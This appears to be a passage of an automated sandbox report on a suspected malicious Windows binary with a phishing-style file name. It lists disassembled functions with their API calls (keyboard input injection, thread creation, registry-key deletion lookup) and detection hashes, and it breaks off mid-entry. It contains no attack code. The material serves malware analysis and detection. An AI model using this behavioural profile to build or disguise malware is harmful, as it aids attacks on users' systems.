Download Yara Rule

APIs

SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
GetFocus.USER32 ref: 00448B1C
EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
EnableWindow.USER32(004A83D8,00000001), ref: 00448C58

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$Enable$Show$FocusMessageSend
String ID:
API String ID: 3429747543-0
Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719

Function 0045D321 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D32F
GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
__swprintf.LIBCMT ref: 0045D3CC
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416

Strings

%lu, xrefs: 0045D3C6
HH, xrefs: 0045D3ED

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu$HH
API String ID: 3164766367-3924996404
Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A

Function 00450DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62

Strings

Msctls_Progress32, xrefs: 00450DF8

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend
String ID: Msctls_Progress32
API String ID: 3850602802-3636473452
Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58

Function 00455449 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON

Download Yara Rule

APIs

ImageList_Destroy.COMCTL32(?), ref: 00455451
ImageList_Destroy.COMCTL32(?), ref: 0045545F
DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
DestroyWindow.USER32(?,?,?,?,?), ref: 00455678

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Destroy$DeleteImageList_ObjectWindow$Icon
String ID:
API String ID: 3985565216-0
Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69

Function 00415702 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 00415737
__calloc_crt.LIBCMT ref: 00415743
__getptd.LIBCMT ref: 00415750
CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
__dosmaperr.LIBCMT ref: 004157A9

Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23

Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
String ID:
API String ID: 1269668773-0
Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D

Function 00439102 Relevance: 10.5, APIs: 7, Instructions: 46threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65

Function 0041568B Relevance: 10.5, APIs: 7, Instructions: 37threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 00415690

Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE

___fls_getvalue@4.LIBCMT ref: 0041569B

Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72

___fls_setvalue@8.LIBCMT ref: 004156AD

Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9

GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
ExitThread.KERNEL32 ref: 004156BD
__freefls@4.LIBCMT ref: 004156D9
__IsNonwritableInCurrentImage.LIBCMT ref: 004156EC

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 4166825349-0
Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C

Function 00434124 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146

Strings

p#D, xrefs: 00434125
advapi32.dll, xrefs: 0043412F
p#D, xrefs: 00434124
RegDeleteKeyExW, xrefs: 00434140

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
API String ID: 2574300362-3261711971
Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68

Function 0047B1D0 Relevance: 9.5, APIs: 6, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA

Function 004336C7 Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00433724
GetWindowRect.USER32(00000000,?), ref: 00433757
GetClientRect.USER32(0000001D,?), ref: 004337AC
GetSystemMetrics.USER32(0000000F), ref: 00433800
GetWindowRect.USER32(?,?), ref: 00433814
ScreenToClient.USER32(?,?), ref: 00433842

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Rect$Client$Window$MetricsScreenSystem
String ID:
API String ID: 3220332590-0
Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A

Function 00457838 Relevance: 9.2, APIs: 6, Instructions: 176COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0045788F
_malloc.LIBCMT ref: 004578A5
_strcat.LIBCMT ref: 004578CE
_wcslen.LIBCMT ref: 004578FB
_malloc.LIBCMT ref: 00457914
_wcscpy.LIBCMT ref: 0045792C

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _malloc_wcslen$_strcat_wcscpy
String ID:
API String ID: 1612042205-0
Opcode ID: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
Opcode Fuzzy Hash: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A

Function 0044C522 Relevance: 9.2, APIs: 6, Instructions: 155windowkeyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
SetKeyboardState.USER32(00000080), ref: 0044C59B
PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
SendInput.USER32 ref: 0044C6E2

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessagePost$KeyboardState$InputSend
String ID:
API String ID: 2221674350-0
Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA

Function 00445153 Relevance: 9.1, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 0044523F
_wcscat.LIBCMT ref: 00445246
_wcscpy.LIBCMT ref: 0044525A
_wcscpy.LIBCMT ref: 0044528C
_wcscat.LIBCMT ref: 00445293
_wcscpy.LIBCMT ref: 004452A7

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcscpy$_wcscat
String ID:
API String ID: 2037614760-0
Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE

Function 00447B66 Relevance: 9.1, APIs: 6, Instructions: 119COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
GetWindowRect.USER32(?,?), ref: 00447C1B
ScreenToClient.USER32(?,?), ref: 00447C39
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
EndPaint.USER32(?,?), ref: 00447CD1

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Paint$BeginClientRectRectangleScreenViewportWindow
String ID:
API String ID: 4189319755-0
Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69

Function 0044B474 Relevance: 9.1, APIs: 6, Instructions: 113fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID:
API String ID: 1726766782-0
Opcode ID: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
Opcode Fuzzy Hash: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A

Function 00441077 Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
EnableWindow.USER32(?,00000000), ref: 0044111A
ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
EnableWindow.USER32(?,00000001), ref: 004411B3
SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
